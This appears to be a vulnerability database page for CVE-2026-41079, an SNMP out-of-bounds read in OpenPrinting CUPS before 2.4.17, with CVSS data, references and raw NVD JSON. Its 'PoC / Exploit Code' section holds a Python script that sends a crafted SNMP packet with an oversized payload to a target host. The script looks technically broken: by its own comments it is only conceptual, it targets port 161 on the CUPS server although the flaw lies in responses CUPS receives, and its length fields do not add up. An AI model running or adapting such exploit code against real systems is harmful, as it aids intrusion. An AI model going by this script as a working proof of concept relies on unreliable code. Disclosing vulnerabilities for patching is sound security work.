Security Vulnerability Report
中文
CVE-2026-41079 CVSS 4.3 MEDIUM

CVE-2026-41079

Published: 2026-04-24 17:16:21
Last Modified: 2026-04-27 13:40:55
Source: [email protected]

Description

OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. Prior to 2.4.17, a network-adjacent attacker can send a crafted SNMP response to the CUPS SNMP backend that causes an out-of-bounds read of up to 176 bytes past a stack buffer. The leaked memory is converted from UTF-16 to UTF-8 and stored as printer supply description strings, which are subsequently visible to authenticated users via IPP Get-Printer-Attributes responses and the CUPS web interface. This vulnerability is fixed in 2.4.17.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:openprinting:cups:*:*:*:*:*:*:*:* - VULNERABLE
OpenPrinting CUPS < 2.4.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-41079: CUPS SNMP Out-of-Bounds Read # This script demonstrates sending a crafted SNMP response to trigger the vulnerability. import socket import struct def send_malicious_snmp(target_ip): # SNMP UDP port port = 161 # Construct a simplified SNMP response packet structure # This payload is designed to trigger the overflow in the CUPS SNMP backend. # Note: Actual exploitation requires precise ASN.1 encoding specific to the CUPS implementation. # Community string 'public' community = b'public' # A crafted payload that exceeds the expected buffer size to trigger OOB read # The vulnerability allows reading up to 176 bytes past the buffer. # We construct a long string to simulate the overflow condition. overflow_payload = b'A' * 200 # Basic SNMP Packet Structure (Type, Length, Value) # This is a conceptual representation. Real packets require proper ASN.1 BER encoding. snmp_packet = b'\x30' + struct.pack('>B', len(community) + len(overflow_payload) + 4) # Sequence snmp_packet += b'\x02\x01\x01' # Version (v2c) snmp_packet += b'\x04' + struct.pack('>B', len(community)) + community # Community snmp_packet += b'\xa2' + struct.pack('>B', len(overflow_payload)) + overflow_payload # PDU GetResponse try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(snmp_packet, (target_ip, port)) print(f"[+] Malicious SNMP packet sent to {target_ip}") print("[+] Check the CUPS Web Interface for memory leaks in printer attributes.") sock.close() except Exception as e: print(f"[-] Error sending packet: {e}") if __name__ == "__main__": # Replace with the target CUPS server IP target = "192.168.1.100" send_malicious_snmp(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41079", "sourceIdentifier": "[email protected]", "published": "2026-04-24T17:16:21.340", "lastModified": "2026-04-27T13:40:54.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. Prior to 2.4.17, a network-adjacent attacker can send a crafted SNMP response to the CUPS SNMP backend that causes an out-of-bounds read of up to 176 bytes past a stack buffer. The leaked memory is converted from UTF-16 to UTF-8 and stored as printer supply description strings, which are subsequently visible to authenticated users via IPP Get-Printer-Attributes responses and the CUPS web interface. This vulnerability is fixed in 2.4.17."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openprinting:cups:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.17", "matchCriteriaId": "7CC76E8F-8DC0-4A44-A6EB-2C2C6CF289AC"}]}]}], "references": [{"url": "https://github.com/OpenPrinting/cups/commit/b7c2525a885f528d243c3a92197ca99609b3f080", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OpenPrinting/cups/commit/d7fe0f521ff3b24676511e747b058362b9a20737", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-6wpw-g8g6-wvrv", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/OpenPrinting/cups/security/advisories/GHSA-6wpw-g8g6-wvrv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.